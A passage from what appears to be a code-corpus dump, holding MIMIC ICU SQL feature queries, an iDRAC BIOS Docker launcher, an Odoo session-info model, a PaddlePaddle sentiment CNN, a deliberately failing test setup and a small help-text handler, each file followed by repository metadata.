, min(case when VitalID = 4 then valuenum else null end) as MeanBP_Min
, max(case when VitalID = 4 then valuenum else null end) as MeanBP_Max
, avg(case when VitalID = 4 then valuenum else null end) as MeanBP_Mean
, min(case when VitalID = 5 then valuenum else null end) as RespRate_Min
, max(case when VitalID = 5 then valuenum else null end) as RespRate_Max
, avg(case when VitalID = 5 then valuenum else null end) as RespRate_Mean
, min(case when VitalID = 6 then valuenum else null end) as TempC_Min
, max(case when VitalID = 6 then valuenum else null end) as TempC_Max
, avg(case when VitalID = 6 then valuenum else null end) as TempC_Mean
, min(case when VitalID = 7 then valuenum else null end) as SpO2_Min
, max(case when VitalID = 7 then valuenum else null end) as SpO2_Max
, avg(case when VitalID = 7 then valuenum else null end) as SpO2_Mean
, min(case when VitalID = 8 then valuenum else null end) as Glucose_Min
, max(case when VitalID = 8 then valuenum else null end) as Glucose_Max
, avg(case when VitalID = 8 then valuenum else null end) as Glucose_Mean
FROM (
select ie.subject_id, ie.hadm_id, ie.icustay_id
, case
when itemid in (211,220045) and valuenum > 0 and valuenum < 300 then 1 -- HeartRate
when itemid in (51,442,455,6701,220179,220050) and valuenum > 0 and valuenum < 400 then 2 -- SysBP
when itemid in (8368,8440,8441,8555,220180,220051) and valuenum > 0 and valuenum < 300 then 3 -- DiasBP
when itemid in (456,52,6702,443,220052,220181,225312) and valuenum > 0 and valuenum < 300 then 4 -- MeanBP
when itemid in (615,618,220210,224690) and valuenum > 0 and valuenum < 70 then 5 -- RespRate
when itemid in (223761,678) and valuenum > 70 and valuenum < 120 then 6 -- TempF, converted to degC in valuenum call
when itemid in (223762,676) and valuenum > 10 and valuenum < 50 then 6 -- TempC
when itemid in (646,220277) and valuenum > 0 and valuenum <= 100 then 7 -- SpO2
when itemid in (807,811,1529,3745,3744,225664,220621,226537) and valuenum > 0 then 8 -- Glucose
else null end as VitalID
-- convert F to C
, case when itemid in (223761,678) then (valuenum-32)/1.8 else valuenum end as valuenum
from icustays ie
left join chartevents ce
on ie.subject_id = ce.subject_id and ie.hadm_id = ce.hadm_id and ie.icustay_id = ce.icustay_id
and ce.charttime between ie.intime and ie.intime + interval '48' hour
-- exclude rows marked as error
and ce.error IS DISTINCT FROM 1
where ce.itemid in
(
-- HEART RATE
211, --"Heart Rate"
220045, --"Heart Rate"
-- Systolic/diastolic
51, -- Arterial BP [Systolic]
442, -- Manual BP [Systolic]
455, -- NBP [Systolic]
6701, -- Arterial BP #2 [Systolic]
220179, -- Non Invasive Blood Pressure systolic
220050, -- Arterial Blood Pressure systolic
8368, -- Arterial BP [Diastolic]
8440, -- Manual BP [Diastolic]
8441, -- NBP [Diastolic]
8555, -- Arterial BP #2 [Diastolic]
220180, -- Non Invasive Blood Pressure diastolic
220051, -- Arterial Blood Pressure diastolic
-- MEAN ARTERIAL PRESSURE
456, --"NBP Mean"
52, --"Arterial BP Mean"
6702, -- Arterial BP Mean #2
443, -- Manual BP Mean(calc)
220052, --"Arterial Blood Pressure mean"
220181, --"Non Invasive Blood Pressure mean"
225312, --"ART BP mean"
-- RESPIRATORY RATE
618,-- Respiratory Rate
615,-- Resp Rate (Total)
220210,-- Respiratory Rate
224690, -- Respiratory Rate (Total)
-- SPO2, peripheral
646, 220277,
-- GLUCOSE, both lab and fingerstick
807,-- Fingerstick Glucose
811,-- Glucose (70-105)
1529,-- Glucose
3745,-- BloodGlucose
3744,-- Blood Glucose
225664,-- Glucose finger stick
220621,-- Glucose (serum)
226537,-- Glucose (whole blood)
-- TEMPERATURE
223762, -- "Temperature Celsius"
676, -- "Temperature C"
223761, -- "Temperature Fahrenheit"
678 -- "Temperature F"
)
) pvt
group by pvt.subject_id, pvt.hadm_id, pvt.icustay_id
order by pvt.subject_id, pvt.hadm_id, pvt.icustay_id;
"""
vit48 = pd.read_sql_query(vitquery,con)
vit48.isnull().sum()
#===============48 hour labs query
# This query does the following:
# it extracts the lab events in the first 48 hours
# it labels the lab items and cleans up their values
# it will create a set of lab values
# 48 hours.
labquery = \
"""
WITH pvt AS (
--- ie is the icu stay
--- ad is the admissions table
--- le is the lab events table
SELECT ie.subject_id, ie.hadm_id, ie.icustay_id, le.charttime
-- here we assign labels to ITEMIDs
-- this also fuses together multiple ITEMIDs containing the same data
, CASE
when le.itemid = 50868 then 'ANION GAP'
when le.itemid = 50862 then 'ALBUMIN'
when le.itemid = 50882 then 'BICARBONATE'
when le.itemid = 50885 then 'BILIRUBIN'
when le.itemid = 50912 then 'CREATININE'
when le.itemid = 50806 then 'CHLORIDE'
when le.itemid = 50902 then 'CHLORIDE'
when le.itemid = 50809 then 'GLUCOSE'
when le.itemid = 50931 then 'GLUCOSE'
when le.itemid = 50810 then 'HEMATOCRIT'
when le.itemid = 51221 then 'HEMATOCRIT'
when le.itemid = 50811 then 'HEMOGLOBIN'
when le.itemid = 51222 then 'HEMOGLOBIN'
when le.itemid = 50813 then 'LACTATE'
when le.itemid = 50960 then 'MAGNESIUM'
when le.itemid = 50970 then 'PHOSPHATE'
when le.itemid = 51265 then 'PLATELET'
when le.itemid = 50822 then 'POTASSIUM'
when le.itemid = 50971 then 'POTASSIUM'
when le.itemid = 51275 then 'PTT'
when le.itemid = 51237 then 'INR'
when le.itemid = 51274 then 'PT'
when le.itemid = 50824 then 'SODIUM'
when le.itemid = 50983 then 'SODIUM'
when le.itemid = 51006 then 'BUN'
when le.itemid = 51300 then 'WBC'
when le.itemid = 51301 then 'WBC'
ELSE null
END AS label
, -- add in some sanity checks on the values
-- the where clause below requires all valuenum to be > 0,
-- so these are only upper limit checks
CASE
when le.itemid = 50862 and le.valuenum > 10 then null -- g/dL 'ALBUMIN'
when le.itemid = 50868 and le.valuenum > 10000 then null -- mEq/L 'ANION GAP'
when le.itemid = 50882 and le.valuenum > 10000 then null -- mEq/L 'BICARBONATE'
when le.itemid = 50885 and le.valuenum > 150 then null -- mg/dL 'BILIRUBIN'
when le.itemid = 50806 and le.valuenum > 10000 then null -- mEq/L 'CHLORIDE'
when le.itemid = 50902 and le.valuenum > 10000 then null -- mEq/L 'CHLORIDE'
when le.itemid = 50912 and le.valuenum > 150 then null -- mg/dL 'CREATININE'
when le.itemid = 50809 and le.valuenum > 10000 then null -- mg/dL 'GLUCOSE'
when le.itemid = 50931 and le.valuenum > 10000 then null -- mg/dL 'GLUCOSE'
when le.itemid = 50810 and le.valuenum > 100 then null -- % 'HEMATOCRIT'
when le.itemid = 51221 and le.valuenum > 100 then null -- % 'HEMATOCRIT'
when le.itemid = 50811 and le.valuenum > 50 then null -- g/dL 'HEMOGLOBIN'
when le.itemid = 51222 and le.valuenum > 50 then null -- g/dL 'HEMOGLOBIN'
when le.itemid = 50813 and le.valuenum > 50 then null -- mmol/L 'LACTATE'
when le.itemid = 50960 and le.valuenum > 60 then null -- mmol/L 'MAGNESIUM'
when le.itemid = 50970 and le.valuenum > 60 then null -- mg/dL 'PHOSPHATE'
when le.itemid = 51265 and le.valuenum > 10000 then null -- K/uL 'PLATELET'
when le.itemid = 50822 and le.valuenum > 30 then null -- mEq/L 'POTASSIUM'
when le.itemid = 50971 and le.valuenum > 30 then null -- mEq/L 'POTASSIUM'
when le.itemid = 51275 and le.valuenum > 150 then null -- sec 'PTT'
when le.itemid = 51237 and le.valuenum > 50 then null -- 'INR'
when le.itemid = 51274 and le.valuenum > 150 then null -- sec 'PT'
when le.itemid = 50824 and le.valuenum > 200 then null -- mEq/L == mmol/L 'SODIUM'
when le.itemid = 50983 and le.valuenum > 200 then null -- mEq/L == mmol/L 'SODIUM'
when le.itemid = 51006 and le.valuenum > 300 then null -- 'BUN'
when le.itemid = 51300 and le.valuenum > 1000 then null -- 'WBC'
when le.itemid = 51301 and le.valuenum > 1000 then null -- 'WBC'
ELSE le.valuenum
END AS valuenum
FROM icustays ie
LEFT JOIN labevents le
ON le.subject_id = ie.subject_id
AND le.hadm_id = ie.hadm_id
-- TODO: they are using lab times 6 hours before the start of the
-- ICU stay.
AND le.charttime between (ie.intime - interval '6' hour)
AND (ie.intime + interval '48' hour)
AND le.itemid IN
(
-- comment is: LABEL | CATEGORY | FLUID | NUMBER OF ROWS IN LABEVENTS
50868, -- ANION GAP | CHEMISTRY | BLOOD | 769895
50862, -- ALBUMIN | CHEMISTRY | BLOOD | 146697
50882, -- BICARBONATE | CHEMISTRY | BLOOD | 780733
50885, -- BILIRUBIN, TOTAL | CHEMISTRY | BLOOD | 238277
50912, -- CREATININE | CHEMISTRY | BLOOD | 797476
50902, -- CHLORIDE | CHEMISTRY | BLOOD | 795568
50806, -- CHLORIDE, WHOLE BLOOD | BLOOD GAS | BLOOD | 48187
50931, -- GLUCOSE | CHEMISTRY | BLOOD | 748981
50809, -- GLUCOSE | BLOOD GAS | BLOOD | 196734
51221, -- HEMATOCRIT | HEMATOLOGY | BLOOD | 881846
50810, -- HEMATOCRIT, CALCULATED | BLOOD GAS | BLOOD | 89715
51222, -- HEMOGLOBIN | HEMATOLOGY | BLOOD | 752523
50811, -- HEMOGLOBIN | BLOOD GAS | BLOOD | 89712
50813, -- LACTATE | BLOOD GAS | BLOOD | 187124
50960, -- MAGNESIUM | CHEMISTRY | BLOOD | 664191
50970, -- PHOSPHATE | CHEMISTRY | BLOOD | 590524
51265, -- PLATELET COUNT | HEMATOLOGY | BLOOD | 778444
50971, -- POTASSIUM | CHEMISTRY | BLOOD | 845825
50822, -- POTASSIUM, WHOLE BLOOD | BLOOD GAS | BLOOD | 192946
51275, -- PTT | HEMATOLOGY | BLOOD | 474937
51237, -- INR(PT) | HEMATOLOGY | BLOOD | 471183
51274, -- PT | HEMATOLOGY | BLOOD | 469090
50983, -- SODIUM | CHEMISTRY | BLOOD | 808489
50824, -- SODIUM, WHOLE BLOOD | BLOOD GAS | BLOOD | 71503
51006, -- UREA NITROGEN | CHEMISTRY | BLOOD | 791925
51301, -- WHITE BLOOD CELLS | HEMATOLOGY | BLOOD | 753301
51300 -- WBC COUNT | HEMATOLOGY | BLOOD | 2371
)
AND le.valuenum IS NOT null
AND le.valuenum > 0 -- lab values cannot be 0 and cannot be negative
LEFT JOIN admissions ad
ON ie.subject_id = ad.subject_id
AND ie.hadm_id = ad.hadm_id
),
ranked AS (
SELECT pvt.*, DENSE_RANK() OVER (PARTITION BY
pvt.subject_id, pvt.hadm_id,pvt.icustay_id,pvt.label ORDER BY pvt.charttime) as drank
FROM pvt
)
SELECT r.subject_id, r.hadm_id, r.icustay_id
, max(case when label = 'ANION GAP' then valuenum else null end) as ANIONGAP
, max(case when label = 'ALBUMIN' then valuenum else null end) as ALBUMIN
, max(case when label = 'BICARBONATE' then valuenum else null end) as BICARBONATE
, max(case when label = 'BILIRUBIN' then valuenum else null end) as BILIRUBIN
, max(case when label = 'CREATININE' then valuenum else null end) as CREATININE
, max(case when label = 'CHLORIDE' then valuenum else null end) as CHLORIDE
, max(case when label = 'GLUCOSE' then valuenum else null end) as GLUCOSE
, max(case when label = 'HEMATOCRIT' then valuenum else null end) as HEMATOCRIT
, max(case when label = 'HEMOGLOBIN' then valuenum else null end) as HEMOGLOBIN
, max(case when label = 'LACTATE' then valuenum else null end) as LACTATE
, max(case when label = 'MAGNESIUM' then valuenum else null end) as MAGNESIUM
, max(case when label = 'PHOSPHATE' then valuenum else null end) as PHOSPHATE
, max(case when label = 'PLATELET' then valuenum else null end) as PLATELET
, max(case when label = 'POTASSIUM' then valuenum else null end) as POTASSIUM
, max(case when label = 'PTT' then valuenum else null end) as PTT
, max(case when label = 'INR' then valuenum else null end) as INR
, max(case when label = 'PT' then valuenum else null end) as PT
, max(case when label = 'SODIUM' then valuenum else null end) as SODIUM
, max(case when label = 'BUN' then valuenum else null end) as BUN
, max(case when label = 'WBC' then valuenum else null end) as WBC
FROM ranked r
WHERE r.drank = 1
GROUP BY r.subject_id, r.hadm_id, r.icustay_id, r.drank
ORDER BY r.subject_id, r.hadm_id, r.icustay_id, r.drank;
"""
lab48 = pd.read_sql_query(labquery,con)
#=========notes
notesquery = \
"""
SELECT fin.subject_id, fin.hadm_id, fin.icustay_id, string_agg(fin.text, ' ') as chartext
FROM (
select ie.subject_id, ie.hadm_id, ie.icustay_id, ne.text
from icustays ie
left join noteevents ne
on ie.subject_id = ne.subject_id and ie.hadm_id = ne.hadm_id
and ne.charttime between ie.intime and ie.intime + interval '48' hour
--and ne.iserror != '1'
) fin
group by fin.subject_id, fin.hadm_id, fin.icustay_id
order by fin.subject_id, fin.hadm_id, fin.icustay_id;
"""
notes48 = pd.read_sql_query(notesquery,con)
#=====combine all variables
mort_ds = den.merge(vit48,how = 'left', on = ['subject_id', 'hadm_id', 'icustay_id'])
mort_ds = mort_ds.merge(lab48,how = 'left', on = ['subject_id', 'hadm_id', 'icustay_id'])
#======missing values (following joydeep ghosh's paper)
# create means by age group and gender
mort_ds['age_group'] = pd.cut(mort_ds['age'], [-1,5,10,15,20, 25, 40,60, 80, 200],
labels = ['l5','5_10', '10_15', '15_20', '20_25', '25_40', '40_60', '60_80', '80p'])
mort_ds = mort_ds.groupby(['age_group', 'gender'])
mort_ds = mort_ds.transform(replace)
#mort_ds.drop('age_group', 1, inplace =True )
# one missing variable
adult_icu = mort_ds[(mort_ds.adult_icu==1)].dropna()
# create training and testing labels
msk = np.random.rand(len(adult_icu)) < 0.7
adult_icu['train'] = np.where(msk, 1, 0)
adult_icu.to_csv(os.path.join(mimicdir, 'adult_icu.gz'), compression='gzip', index = False)
# notes
adult_notes = notes48.merge(adult_icu[['train', 'subject_id', 'hadm_id', 'icustay_id', 'mort_icu']], how = 'right', on = ['subject_id', 'hadm_id', 'icustay_id'])
adult_notes.to_csv(os.path.join(mimicdir, 'adult_notes.gz'), compression='gzip', index = False)
| 41.254202 | 202 | 0.685135 | 2,988 | 19,637 | 4.437082 | 0.186078 | 0.033188 | 0.048876 | 0.045105 | 0.422688 | 0.313094 | 0.262257 | 0.220697 | 0.201539 | 0.183059 | 0 | 0.078119 | 0.204054 | 19,637 | 475 | 203 | 41.341053 | 0.770122 | 0.082192 | 0 | 0 | 1 | 0 | 0.212693 | 0 | 0 | 0 | 0 | 0.002105 | 0 | 1 | 0.018519 | false | 0.018519 | 0.111111 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4918f13347223ad7457de28e1dde690394ca0299 | 2,176 | py | Python | bios-token.py | emahear/openusm | 96bb62b91f4b5520e14d86ae86e1b320404134e6 | [
"MIT"
] | 4 | 2019-08-04T05:50:46.000Z | 2020-04-16T19:24:11.000Z | bios-token.py | emahear/openusm | 96bb62b91f4b5520e14d86ae86e1b320404134e6 | [
"MIT"
] | null | null | null | bios-token.py | emahear/openusm | 96bb62b91f4b5520e14d86ae86e1b320404134e6 | [
"MIT"
] | 6 | 2019-08-03T12:57:47.000Z | 2020-06-08T01:50:43.000Z | import os
import argparse
def _create_parser():
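    """Build the command-line argument parser for the BIOS token tool."""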
    parser = argparse.ArgumentParser(description='Welcome to Universal Systems Manager '
                                                 'Bios Token Change')
parser.add_argument('--verbose',
help='Turn on verbose logging',
action='store_true')
parser.add_argument('-i', '--idrac',
help='iDRAC IP of the Host'
)
parser.add_argument('-n', '--nfs',
help='NFS server IP address',
default=None)
parser.add_argument('-s', '--share',
help='NFS Share folder'
)
parser.add_argument('-c', '--config',
help='XML File to be imported'
)
parser.add_argument('-f', '--ips',
help='IP files to be updated'
)
return parser
def main():
parser = _create_parser()
args = parser.parse_args()
nfs_server = args.nfs
idrac = args.idrac
nfs_share = args.share
config = args.config
os.system("docker build -t ajeetraina/usm_redfish . ")
    if args.ips:
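        # Launch one detached container per iDRAC IP listed in the file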
        with open(args.ips) as ips_file:
            ips = ips_file.readlines()
for ip in ips:
print ("Iteration %s"%ip)
ip = ip.strip()
command = "docker run --rm --log-driver=syslog --log-opt syslog-address=tcp://0.0.0.0:5000 --log-opt syslog-facility=daemon -itd --name=%s_server -e IDRAC_IP=%s -e NFS_SERVER=%s -e NFS_SERVER_SHARE=%s -e CONFIG_FILE=%s ajeetraina/usm_redfish python import_scp.py &"%(ip,ip,nfs_server,nfs_share,config)
            print(command)
os.system(command)
    if args.idrac:
os.system(
"docker run --rm --log-driver=syslog --log-opt syslog-address=tcp://0.0.0.0:5000 --log-opt syslog-facility=daemon -itd --name=%s_server -e IDRAC_IP=%s -e NFS_SERVER=%s -e NFS_SERVER_SHARE=%s -e CONFIG_FILE=%s ajeetraina/usm_redfish python import_scp.py &" % (
idrac,idrac, nfs_server, nfs_share, config))
if __name__ == '__main__':
main()
| 32.477612 | 306 | 0.552849 | 272 | 2,176 | 4.25 | 0.323529 | 0.062284 | 0.088235 | 0.038062 | 0.352941 | 0.313149 | 0.313149 | 0.313149 | 0.313149 | 0.313149 | 0 | 0.010818 | 0.320313 | 2,176 | 66 | 307 | 32.969697 | 0.770791 | 0 | 0 | 0 | 0 | 0.041667 | 0.370864 | 0.080882 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.104167 | null | null | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
491cf38094ed0cb56e1412d6daa74c8867a4538f | 4,103 | py | Python | odoo-13.0/addons/web/models/ir_http.py | VaibhavBhujade/Blockchain-ERP-interoperability | b5190a037fb6615386f7cbad024d51b0abd4ba03 | [
"MIT"
] | 12 | 2021-03-26T08:39:40.000Z | 2022-03-16T02:20:10.000Z | odoo-13.0/addons/web/models/ir_http.py | VaibhavBhujade/Blockchain-ERP-interoperability | b5190a037fb6615386f7cbad024d51b0abd4ba03 | [
"MIT"
] | 13 | 2020-12-20T16:00:21.000Z | 2022-03-14T14:55:30.000Z | odoo-13.0/addons/web/models/ir_http.py | VaibhavBhujade/Blockchain-ERP-interoperability | b5190a037fb6615386f7cbad024d51b0abd4ba03 | [
"MIT"
] | 17 | 2020-08-31T11:18:49.000Z | 2022-02-09T05:57:31.000Z | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import hashlib
import json
from odoo import api, models
from odoo.http import request
from odoo.tools import ustr
from odoo.addons.web.controllers.main import module_boot, HomeStaticTemplateHelpers
import odoo
class Http(models.AbstractModel):
_inherit = 'ir.http'
def webclient_rendering_context(self):
return {
'menu_data': request.env['ir.ui.menu'].load_menus(request.session.debug),
'session_info': self.session_info(),
}
def session_info(self):
user = request.env.user
version_info = odoo.service.common.exp_version()
user_context = request.session.get_context() if request.session.uid else {}
session_info = {
"uid": request.session.uid,
"is_system": user._is_system() if request.session.uid else False,
"is_admin": user._is_admin() if request.session.uid else False,
"user_context": request.session.get_context() if request.session.uid else {},
"db": request.session.db,
"server_version": version_info.get('server_version'),
"server_version_info": version_info.get('server_version_info'),
"name": user.name,
"username": user.login,
"partner_display_name": user.partner_id.display_name,
"company_id": user.company_id.id if request.session.uid else None, # YTI TODO: Remove this from the user context
"partner_id": user.partner_id.id if request.session.uid and user.partner_id else None,
"web.base.url": self.env['ir.config_parameter'].sudo().get_param('web.base.url', default=''),
}
if self.env.user.has_group('base.group_user'):
# the following is only useful in the context of a webclient bootstrapping
# but is still included in some other calls (e.g. '/web/session/authenticate')
# to avoid access errors and unnecessary information, it is only included for users
# with access to the backend ('internal'-type users)
mods = module_boot()
qweb_checksum = HomeStaticTemplateHelpers.get_qweb_templates_checksum(addons=mods, debug=request.session.debug)
lang = user_context.get("lang")
translation_hash = request.env['ir.translation'].get_web_translations_hash(mods, lang)
menu_json_utf8 = json.dumps(request.env['ir.ui.menu'].load_menus(request.session.debug), default=ustr, sort_keys=True).encode()
cache_hashes = {
"load_menus": hashlib.sha1(menu_json_utf8).hexdigest(),
"qweb": qweb_checksum,
"translations": translation_hash,
}
session_info.update({
# current_company should be default_company
"user_companies": {'current_company': (user.company_id.id, user.company_id.name), 'allowed_companies': [(comp.id, comp.name) for comp in user.company_ids]},
"currencies": self.get_currencies(),
"show_effect": True,
"display_switch_company_menu": user.has_group('base.group_multi_company') and len(user.company_ids) > 1,
"cache_hashes": cache_hashes,
})
return session_info
@api.model
def get_frontend_session_info(self):
return {
'is_admin': request.session.uid and self.env.user._is_admin() or False,
'is_system': request.session.uid and self.env.user._is_system() or False,
'is_website_user': request.session.uid and self.env.user._is_public() or False,
'user_id': request.session.uid and self.env.user.id or False,
'is_frontend': True,
}
def get_currencies(self):
Currency = request.env['res.currency']
currencies = Currency.search([]).read(['symbol', 'position', 'decimal_places'])
return {c['id']: {'symbol': c['symbol'], 'position': c['position'], 'digits': [69,c['decimal_places']]} for c in currencies}
| 48.845238 | 172 | 0.6427 | 514 | 4,103 | 4.931907 | 0.319066 | 0.093886 | 0.073767 | 0.04497 | 0.213018 | 0.17357 | 0.133333 | 0.121105 | 0.082051 | 0.082051 | 0 | 0.002244 | 0.239825 | 4,103 | 83 | 173 | 49.433735 | 0.810516 | 0.112844 | 0 | 0.030769 | 0 | 0 | 0.157532 | 0.014046 | 0 | 0 | 0 | 0.012048 | 0 | 1 | 0.061538 | false | 0 | 0.107692 | 0.030769 | 0.261538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4929f7cf615e61de5c4f61ef44c5340e9ac4492a | 3,290 | py | Python | python/paddle/v2/fluid/tests/book/test_understand_sentiment_conv.py | QingshuChen/Paddle | 25a92be3e123ed21fd98c7be6bd7e3a6320756a3 | [
"Apache-2.0"
] | null | null | null | python/paddle/v2/fluid/tests/book/test_understand_sentiment_conv.py | QingshuChen/Paddle | 25a92be3e123ed21fd98c7be6bd7e3a6320756a3 | [
"Apache-2.0"
] | 9 | 2017-09-13T07:39:31.000Z | 2017-10-18T05:58:23.000Z | python/paddle/v2/fluid/tests/book/test_understand_sentiment_conv.py | QingshuChen/Paddle | 25a92be3e123ed21fd98c7be6bd7e3a6320756a3 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import paddle.v2 as paddle
import paddle.v2.fluid.core as core
import paddle.v2.fluid.evaluator as evaluator
import paddle.v2.fluid.framework as framework
import paddle.v2.fluid.layers as layers
import paddle.v2.fluid.nets as nets
from paddle.v2.fluid.executor import Executor
from paddle.v2.fluid.optimizer import AdamOptimizer
def convolution_net(input_dim, class_dim=2, emb_dim=32, hid_dim=32):
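    """Text CNN: embedding -> two parallel conv-pool branches (filter sizes 3 and 4) -> softmax classifier trained with Adam."""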
data = layers.data(name="words", shape=[1], data_type="int64")
label = layers.data(name="label", shape=[1], data_type="int64")
emb = layers.embedding(input=data, size=[input_dim, emb_dim])
conv_3 = nets.sequence_conv_pool(
input=emb,
num_filters=hid_dim,
filter_size=3,
act="tanh",
pool_type="sqrt")
conv_4 = nets.sequence_conv_pool(
input=emb,
num_filters=hid_dim,
filter_size=4,
act="tanh",
pool_type="sqrt")
prediction = layers.fc(input=[conv_3, conv_4],
size=class_dim,
act="softmax")
cost = layers.cross_entropy(input=prediction, label=label)
avg_cost = layers.mean(x=cost)
adam_optimizer = AdamOptimizer(learning_rate=0.002)
opts = adam_optimizer.minimize(avg_cost)
accuracy, acc_out = evaluator.accuracy(input=prediction, label=label)
return avg_cost, accuracy, acc_out
def to_lodtensor(data, place):
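    """Flatten a batch of variable-length sequences into a single LoDTensor, recording sequence boundaries in the LoD."""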
seq_lens = [len(seq) for seq in data]
cur_len = 0
lod = [cur_len]
for l in seq_lens:
cur_len += l
lod.append(cur_len)
flattened_data = np.concatenate(data, axis=0).astype("int64")
flattened_data = flattened_data.reshape([len(flattened_data), 1])
res = core.LoDTensor()
res.set(flattened_data, place)
res.set_lod([lod])
return res
def main():
BATCH_SIZE = 100
PASS_NUM = 5
word_dict = paddle.dataset.imdb.word_dict()
dict_dim = len(word_dict)
class_dim = 2
cost, accuracy, acc_out = convolution_net(
input_dim=dict_dim, class_dim=class_dim)
train_data = paddle.batch(
paddle.reader.shuffle(
paddle.dataset.imdb.train(word_dict), buf_size=1000),
batch_size=BATCH_SIZE)
place = core.CPUPlace()
exe = Executor(place)
exe.run(framework.default_startup_program())
for pass_id in xrange(PASS_NUM):
accuracy.reset(exe)
for data in train_data():
tensor_words = to_lodtensor(map(lambda x: x[0], data), place)
label = np.array(map(lambda x: x[1], data)).astype("int64")
label = label.reshape([BATCH_SIZE, 1])
tensor_label = core.LoDTensor()
tensor_label.set(label, place)
outs = exe.run(framework.default_main_program(),
feed={"words": tensor_words,
"label": tensor_label},
fetch_list=[cost, acc_out])
cost_val = np.array(outs[0])
acc_val = np.array(outs[1])
pass_acc = accuracy.eval(exe)
print("cost=" + str(cost_val) + " acc=" + str(acc_val) +
" pass_acc=" + str(pass_acc))
if cost_val < 1.0 and pass_acc > 0.8:
exit(0)
exit(1)
if __name__ == '__main__':
main()
| 32.254902 | 73 | 0.620669 | 449 | 3,290 | 4.327394 | 0.278396 | 0.032939 | 0.046835 | 0.048893 | 0.116315 | 0.055584 | 0.055584 | 0.055584 | 0.055584 | 0.055584 | 0 | 0.023112 | 0.263526 | 3,290 | 101 | 74 | 32.574257 | 0.778787 | 0 | 0 | 0.095238 | 0 | 0 | 0.02766 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0.059524 | 0.107143 | 0 | 0.166667 | 0.011905 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
493212d8687f50b52ca98a00b02e9f83e3d17403 | 247 | py | Python | examples/simple/regression/sample_skipped.py | jonwesneski/end2 | 708c7b96c1086959565e2889a0818451e6e2c931 | [
"MIT"
] | null | null | null | examples/simple/regression/sample_skipped.py | jonwesneski/end2 | 708c7b96c1086959565e2889a0818451e6e2c931 | [
"MIT"
] | 1 | 2022-03-12T19:43:00.000Z | 2022-03-12T19:43:00.000Z | examples/simple/regression/sample_skipped.py | jonwesneski/end2 | 708c7b96c1086959565e2889a0818451e6e2c931 | [
"MIT"
] | null | null | null | from src import (
RunMode,
setup
)
__run_mode__ = RunMode.PARALLEL
@setup
def my_setup(logger):
assert False, "FAILING SETUP ON PURPOSE"
def test_skipped(logger):
assert False, "THIS TEST SHOULD NOT RUN BECAUSE SETUP FAILED"
| 14.529412 | 65 | 0.712551 | 34 | 247 | 4.970588 | 0.676471 | 0.142012 | 0.201183 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.214575 | 247 | 16 | 66 | 15.4375 | 0.871134 | 0 | 0 | 0 | 0 | 0 | 0.279352 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | false | 0 | 0.1 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
49373d99cd60462ee40755d32e9fd17e9129e6bd | 478 | py | Python | jessie_bot/help/help.py | KNNCreative/jessie-bot | de6994b6a58b742f1e943cdfbd84af6c0c183851 | [
"MIT"
] | 1 | 2017-08-06T06:08:29.000Z | 2017-08-06T06:08:29.000Z | jessie_bot/help/help.py | KNNCreative/jessie-bot | de6994b6a58b742f1e943cdfbd84af6c0c183851 | [
"MIT"
] | null | null | null | jessie_bot/help/help.py | KNNCreative/jessie-bot | de6994b6a58b742f1e943cdfbd84af6c0c183851 | [
"MIT"
] | null | null | null | import json
import logging
from pathlib import Path
from hermes.common.lex_utils import success, error
logger = logging.getLogger(__name__)
script_path = Path.cwd().joinpath('hermes/help/script.json')
with script_path.open() as f:
    script = json.load(f)
def handler(event, context):
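    """Join the scripted help lines and return them as a success response."""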
help_text = '\n'.join(script['help_text'])
return success(message=help_text)
if __name__ == '__main__':
res = handler(event={}, context={})
print(json.dumps(res, indent=3)) | 22.761905 | 60 | 0.719665 | 68 | 478 | 4.794118 | 0.588235 | 0.07362 | 0.116564 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002433 | 0.140167 | 478 | 21 | 61 | 22.761905 | 0.790754 | 0 | 0 | 0 | 0 | 0 | 0.087683 | 0.048017 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.307692 | 0 | 0.461538 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
